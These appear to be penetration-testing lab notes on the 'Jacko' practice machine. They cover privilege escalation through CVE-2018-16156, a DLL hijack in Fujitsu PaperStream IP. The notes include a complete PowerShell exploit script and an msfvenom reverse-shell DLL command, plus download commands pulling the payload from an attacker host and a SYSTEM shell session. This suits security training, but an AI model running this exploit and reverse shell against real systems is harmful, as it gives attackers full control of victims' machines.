CVE-2018-16156
/Practice/Jacko/5-Privilege_Escalation/attachments/{DE9D4312-57DD-4F18-8A0A-F63716009A2D}.png)
A vulnerability classified as critical was found in Fujitsu PaperStream IP 1.42.0.5685. This vulnerability affects the function ChangeUninstallString in the library UninOldIS.dll of the component FJTWSVIC Service. The manipulation of the argument PATH as part of Named Pipe leads to untrusted search path. This vulnerability was named CVE-2018-16156. Local access is required to approach this attack.
Exploit
/Practice/Jacko/5-Privilege_Escalation/attachments/{BCDD9ADB-5DEE-488D-A601-63A71F999174}.png)
# Exploit Title: PaperStream IP (TWAIN) 1.42.0.5685 - Local Privilege Escalation
# Exploit Author: 1F98D
# Original Author: securifera
# Date: 12 May 2020
# Vendor Hompage: https://www.fujitsu.com/global/support/products/computing/peripheral/scanners/fi/software/fi6x30-fi6x40-ps-ip-twain32.html
# CVE: CVE-2018-16156
# Tested on: Windows 10 x64
# References:
# https://www.securifera.com/advisories/cve-2018-16156/
# https://github.com/securifera/CVE-2018-16156-Exploit
# A DLL hijack vulnerability exists in the FJTWSVIC service running as part of
# the Fujitsu PaperStream IP (TWAIN) software package. This exploit searches
# for a writable location, copies the specified DLL to that location and then
# triggers the DLL load by sending a message to FJTWSVIC over the FjtwMkic_Fjicube_32
# named pipe.
$ErrorActionPreference = "Stop"
# Example payload generated as follows
# msfvenom -p windows/x64/shell_reverse_tcp -f dll -o shell.dll LHOST=eth0 LPORT=4444
$PayloadFile = "C:\Windows\Temp\UninOldIS.dll"
if ((Test-Path $PayloadFile) -eq $false) {
Write-Host "$PayloadFile not found, did you forget to upload it?"
Exit 1
}
# Find Writable Location
$WritableDirectory = $null
$Path = (Get-ItemProperty -Path "Registry::HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Session Manager\Environment" -Name "PATH").path
$Path -Split ";" | % {
try {
[IO.File]::OpenWrite("$_\x.txt").close()
Remove-Item "$_\x.txt"
$WritableDirectory = $_
} catch {}
}
if ($WritableDirectory -eq $null) {
Write-Host "No writable directories in PATH, FJTWSVIC is not exploitable"
Exit 1
}
Write-Host "Writable location found, copying payload to $WritableDirectory"
Copy-Item "$PayloadFile" "$WritableDirectory\UninOldIS.dll"
Write-Host "Payload copied, triggering..."
$client = New-Object System.IO.Pipes.NamedPipeClientStream(".", "FjtwMkic_Fjicube_32", [System.IO.Pipes.PipeDirection]::InOut, [System.IO.Pipes.PipeOptions]::None, [System.Security.Principal.TokenImpersonationLevel]::Impersonation)
$reader = $null
$writer = $null
try {
$client.Connect()
$reader = New-Object System.IO.StreamReader($client)
$writer = New-Object System.IO.StreamWriter($client)
$writer.AutoFlush = $true
$writer.Write("ChangeUninstallString")
$reader.ReadLine()
} finally {
$client.Dispose()
}
Write-Host "Payload triggered"Exploit found online
Exploitation
PS C:\tmp> iwr -Uri http://192.168.45.192/CVE-2018-16156.ps1 -OutFile C:\tmp\CVE-2018-16156.ps1
PS C:\tmp> iwr -Uri http://192.168.45.192/UninOldIS.dll -OutFile C:\Windows\temp\UninOldIS.dllTransferring both the PowerShell script and DLL payload
PS C:\tmp> .\CVE-2018-16156.ps1
Writable location found, copying payload to C:\JavaTemp\
Payload copied, triggering...Executing the exploit PowerShell script
┌──(kali㉿kali)-[~/PEN-200/PG_PRACTICE/jacko]
└─$ nnc 4444
listening on [any] 4444 ...
connect to [192.168.45.192] from (UNKNOWN) [192.168.236.66] 50305
Microsoft Windows [Version 10.0.18363.836]
(c) 2019 Microsoft Corporation. All rights reserved.
C:\Windows\system32> whoami
whoami
nt authority\system
C:\Windows\system32> hostname
hostname
jacko
C:\Windows\system32> ipconfig
ipconfig
Windows IP Configuration
Ethernet adapter Ethernet0:
Connection-specific DNS Suffix . :
IPv4 Address. . . . . . . . . . . : 192.168.236.66
Subnet Mask . . . . . . . . . . . : 255.255.255.0
Default Gateway . . . . . . . . . : 192.168.236.254System level compromise